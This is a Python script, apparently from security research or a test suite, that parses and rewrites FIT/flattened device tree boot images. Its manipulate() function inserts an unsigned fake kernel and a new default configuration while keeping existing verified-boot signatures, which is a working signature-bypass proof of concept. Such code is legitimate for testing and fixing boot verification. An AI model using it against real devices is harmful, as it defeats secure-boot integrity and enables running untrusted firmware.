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#!/usr/bin/python3
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020, F-Secure Corporation, https://foundry.f-secure.com
#
# pylint: disable=E1101,W0201,C0103
"""
Verified boot image forgery tools and utilities
This module provides services to both take apart and regenerate FIT images
in a way that preserves all existing verified boot signatures, unless you
manipulate nodes in the process.
"""
import struct
import binascii
from io import BytesIO
#
# struct parsing helpers
#
class BetterStructMeta(type):
"""
Preprocesses field definitions and creates a struct.Struct instance from them
"""
def __new__(cls, clsname, superclasses, attributedict):
if clsname != 'BetterStruct':
fields = attributedict['__fields__']
field_types = [_[0] for _ in fields]
field_names = [_[1] for _ in fields if _[1] is not None]
attributedict['__names__'] = field_names
s = struct.Struct(attributedict.get('__endian__', '') + ''.join(field_types))
attributedict['__struct__'] = s
attributedict['size'] = s.size
return type.__new__(cls, clsname, superclasses, attributedict)
class BetterStruct(metaclass=BetterStructMeta):
"""
Base class for better structures
"""
def __init__(self):
for t, n in self.__fields__:
if 's' in t:
setattr(self, n, '')
elif t in ('Q', 'I', 'H', 'B'):
setattr(self, n, 0)
@classmethod
def unpack_from(cls, buffer, offset=0):
"""
Unpack structure instance from a buffer
"""
fields = cls.__struct__.unpack_from(buffer, offset)
instance = cls()
for n, v in zip(cls.__names__, fields):
setattr(instance, n, v)
return instance
def pack(self):
"""
Pack structure instance into bytes
"""
return self.__struct__.pack(*[getattr(self, n) for n in self.__names__])
def __str__(self):
items = ["'%s': %s" % (n, repr(getattr(self, n))) for n in self.__names__ if n is not None]
return '(' + ', '.join(items) + ')'
#
# some defs for flat DT data
#
class HeaderV17(BetterStruct):
__endian__ = '>'
__fields__ = [
('I', 'magic'),
('I', 'totalsize'),
('I', 'off_dt_struct'),
('I', 'off_dt_strings'),
('I', 'off_mem_rsvmap'),
('I', 'version'),
('I', 'last_comp_version'),
('I', 'boot_cpuid_phys'),
('I', 'size_dt_strings'),
('I', 'size_dt_struct'),
]
class RRHeader(BetterStruct):
__endian__ = '>'
__fields__ = [
('Q', 'address'),
('Q', 'size'),
]
class PropHeader(BetterStruct):
__endian__ = '>'
__fields__ = [
('I', 'value_size'),
('I', 'name_offset'),
]
# magical constants for DTB format
OF_DT_HEADER = 0xd00dfeed
OF_DT_BEGIN_NODE = 1
OF_DT_END_NODE = 2
OF_DT_PROP = 3
OF_DT_END = 9
class StringsBlock:
"""
Represents a parsed device tree string block
"""
def __init__(self, values=None):
if values is None:
self.values = []
else:
self.values = values
def __getitem__(self, at):
if isinstance(at, str):
offset = 0
for value in self.values:
if value == at:
break
offset += len(value) + 1
else:
self.values.append(at)
return offset
if isinstance(at, int):
offset = 0
for value in self.values:
if offset == at:
return value
offset += len(value) + 1
raise IndexError('no string found corresponding to the given offset')
raise TypeError('only strings and integers are accepted')
class Prop:
"""
Represents a parsed device tree property
"""
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def clone(self):
return Prop(self.name, self.value)
def __repr__(self):
return "<Prop(name='%s', value=%s>" % (self.name, repr(self.value))
class Node:
"""
Represents a parsed device tree node
"""
def __init__(self, name=None):
self.name = name
self.props = []
self.children = []
def clone(self):
o = Node(self.name)
o.props = [x.clone() for x in self.props]
o.children = [x.clone() for x in self.children]
return o
def __getitem__(self, index):
return self.children[index]
def __repr__(self):
return "<Node('%s'), %s, %s>" % (self.name, repr(self.props), repr(self.children))
#
# flat DT to memory
#
def parse_strings(strings):
"""
Converts the bytes into a StringsBlock instance so it is convenient to work with
"""
strings = strings.split(b'\x00')
return StringsBlock(strings)
def parse_struct(stream):
"""
Parses DTB structure(s) into a Node or Prop instance
"""
tag = bytearray(stream.read(4))[3]
if tag == OF_DT_BEGIN_NODE:
name = b''
while b'\x00' not in name:
name += stream.read(4)
name = name.rstrip(b'\x00')
node = Node(name)
item = parse_struct(stream)
while item is not None:
if isinstance(item, Node):
node.children.append(item)
elif isinstance(item, Prop):
node.props.append(item)
item = parse_struct(stream)
return node
if tag == OF_DT_PROP:
h = PropHeader.unpack_from(stream.read(PropHeader.size))
length = (h.value_size + 3) & (~3)
value = stream.read(length)[:h.value_size]
prop = Prop(h.name_offset, value)
return prop
if tag in (OF_DT_END_NODE, OF_DT_END):
return None
raise ValueError('unexpected tag value')
def read_fdt(fp):
"""
Reads and parses the flattened device tree (or derivatives like FIT)
"""
header = HeaderV17.unpack_from(fp.read(HeaderV17.size))
if header.magic != OF_DT_HEADER:
raise ValueError('invalid magic value %08x; expected %08x' % (header.magic, OF_DT_HEADER))
# TODO: read/parse reserved regions
fp.seek(header.off_dt_struct)
structs = fp.read(header.size_dt_struct)
fp.seek(header.off_dt_strings)
strings = fp.read(header.size_dt_strings)
strblock = parse_strings(strings)
root = parse_struct(BytesIO(structs))
return root, strblock
#
# memory to flat DT
#
def compose_structs_r(item):
"""
Recursive part of composing Nodes and Props into a bytearray
"""
t = bytearray()
if isinstance(item, Node):
t.extend(struct.pack('>I', OF_DT_BEGIN_NODE))
if isinstance(item.name, str):
item.name = bytes(item.name, 'utf-8')
name = item.name + b'\x00'
if len(name) & 3:
name += b'\x00' * (4 - (len(name) & 3))
t.extend(name)
for p in item.props:
t.extend(compose_structs_r(p))
for c in item.children:
t.extend(compose_structs_r(c))
t.extend(struct.pack('>I', OF_DT_END_NODE))
elif isinstance(item, Prop):
t.extend(struct.pack('>I', OF_DT_PROP))
value = item.value
h = PropHeader()
h.name_offset = item.name
if value:
h.value_size = len(value)
t.extend(h.pack())
if len(value) & 3:
value += b'\x00' * (4 - (len(value) & 3))
t.extend(value)
else:
h.value_size = 0
t.extend(h.pack())
return t
def compose_structs(root):
"""
Composes the parsed Nodes into a flat bytearray instance
"""
t = compose_structs_r(root)
t.extend(struct.pack('>I', OF_DT_END))
return t
def compose_strings(strblock):
"""
Composes the StringsBlock instance back into a bytearray instance
"""
b = bytearray()
for s in strblock.values:
b.extend(s)
b.append(0)
return bytes(b)
def write_fdt(root, strblock, fp):
"""
Writes out a complete flattened device tree (or FIT)
"""
header = HeaderV17()
header.magic = OF_DT_HEADER
header.version = 17
header.last_comp_version = 16
fp.write(header.pack())
header.off_mem_rsvmap = fp.tell()
fp.write(RRHeader().pack())
structs = compose_structs(root)
header.off_dt_struct = fp.tell()
header.size_dt_struct = len(structs)
fp.write(structs)
strings = compose_strings(strblock)
header.off_dt_strings = fp.tell()
header.size_dt_strings = len(strings)
fp.write(strings)
header.totalsize = fp.tell()
fp.seek(0)
fp.write(header.pack())
#
# pretty printing / converting to DT source
#
def as_bytes(value):
return ' '.join(["%02X" % x for x in value])
def prety_print_value(value):
"""
Formats a property value as appropriate depending on the guessed data type
"""
if not value:
return '""'
if value[-1] == b'\x00':
printable = True
for x in value[:-1]:
x = ord(x)
if x != 0 and (x < 0x20 or x > 0x7F):
printable = False
break
if printable:
value = value[:-1]
return ', '.join('"' + x + '"' for x in value.split(b'\x00'))
if len(value) > 0x80:
return '[' + as_bytes(value[:0x80]) + ' ... ]'
return '[' + as_bytes(value) + ']'
def pretty_print_r(node, strblock, indent=0):
"""
Prints out a single node, recursing further for each of its children
"""
spaces = ' ' * indent
print((spaces + '%s {' % (node.name.decode('utf-8') if node.name else '/')))
for p in node.props:
print((spaces + ' %s = %s;' % (strblock[p.name].decode('utf-8'), prety_print_value(p.value))))
for c in node.children:
pretty_print_r(c, strblock, indent+1)
print((spaces + '};'))
def pretty_print(node, strblock):
"""
Generates an almost-DTS formatted printout of the parsed device tree
"""
print('/dts-v1/;')
pretty_print_r(node, strblock, 0)
#
# manipulating the DT structure
#
def manipulate(root, strblock):
"""
Maliciously manipulates the structure to create a crafted FIT file
"""
# locate /images/kernel-1 (frankly, it just expects it to be the first one)
kernel_node = root[0][0]
# clone it to save time filling all the properties
fake_kernel = kernel_node.clone()
# rename the node
fake_kernel.name = b'kernel-2'
# get rid of signatures/hashes
fake_kernel.children = []
# NOTE: this simply replaces the first prop... either description or data
# should be good for testing purposes
fake_kernel.props[0].value = b'Super 1337 kernel\x00'
# insert the new kernel node under /images
root[0].children.append(fake_kernel)
# modify the default configuration
root[1].props[0].value = b'conf-2\x00'
# clone the first (only?) configuration
fake_conf = root[1][0].clone()
# rename and change kernel and fdt properties to select the crafted kernel
fake_conf.name = b'conf-2'
fake_conf.props[0].value = b'kernel-2\x00'
fake_conf.props[1].value = b'fdt-1\x00'
# insert the new configuration under /configurations
root[1].children.append(fake_conf)
return root, strblock
def main(argv):
with open(argv[1], 'rb') as fp:
root, strblock = read_fdt(fp)
print("Before:")
pretty_print(root, strblock)
root, strblock = manipulate(root, strblock)
print("After:")
pretty_print(root, strblock)
with open('blah', 'w+b') as fp:
write_fdt(root, strblock, fp)
if __name__ == '__main__':
import sys
main(sys.argv)
# EOF
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